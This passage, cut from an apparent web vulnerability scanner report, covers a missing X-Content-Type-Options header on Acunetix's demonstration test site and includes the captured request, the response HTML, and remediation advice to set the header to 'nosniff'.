19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        29. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAg